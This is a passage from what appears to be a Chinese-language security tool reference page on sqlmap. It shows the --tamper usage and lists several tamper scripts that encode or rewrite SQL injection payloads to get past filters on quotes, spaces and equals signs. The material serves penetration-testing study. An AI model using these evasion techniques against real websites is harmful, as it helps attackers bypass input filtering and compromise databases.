会在运行时向你询问路径。</p> <p>此功能仅对 MySQL 或 PostgreSQL 有用。</p> <h1 id="tamper脚本">tamper脚本 <a href="#tamper脚本" class="header-anchor">#</a></h1> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>use age：sqlmap.py --tamper<span class="token operator">=</span><span class="token string">&quot;模块名.py&quot;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-bash line-numbers-mode"><pre class="language-bash"><code>apostrophemask			<span class="token comment">#将单引号 url 编码</span>
apostrophenullencode	<span class="token comment">#将单引号替换为宽字节 unicode 字符</span>
base64encode			<span class="token comment">#base64 编码</span>
between			<span class="token comment">#将大于符号和等号用 between 语句替换，用于过滤了大于符号和等号的情况</span>
bluecoat		<span class="token comment">#用随机的空白字符代替空格，并且将等号替换为 like ，用于过滤了空格和等号的情况</span>
charencode				<span class="token comment">#用 url 编码一次你的 payload</span>
charunicodeencode		<span class="token comment">#用 unicode 编码 payload ，只编码非编码字符</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p><a href="https://wooyun.js.org/drops/SQLMAP%E8%BF%9B%E9%98%B6%E4%BD%BF%E7%94%A8.html" target="_blank" rel="noopener noreferrer">自定义tamper<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/tools/nmap.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
        nmap端口扫描
      </a></span> <span class="next"><a href="/knowledge/tools/metasploit.html">
        Metasploit漏洞利用框架
        <i aria-label="icon: right" class="anticon anticon-right"><svg viewBox="64 64 896 896" focusable="false" data-icon="right" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M765.7 486.8L314.9 134.7A7.97 7.97 0 0 0 302 141v77.3c0 4.9 2.3 9.6 6.1 12.6l360 281.1-360 281.1c-3.9 3-6.1 7.7-6.1 12.6V883c0 6.7 7.7 10.4 12.9 6.3l450.8-352.1a31.96 31.96 0 0 0 0-50.4z"></path></svg></i></a></span></p></div> </main> <!----></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/70.9fb74c80.js" defer></script>
  </body>
</html>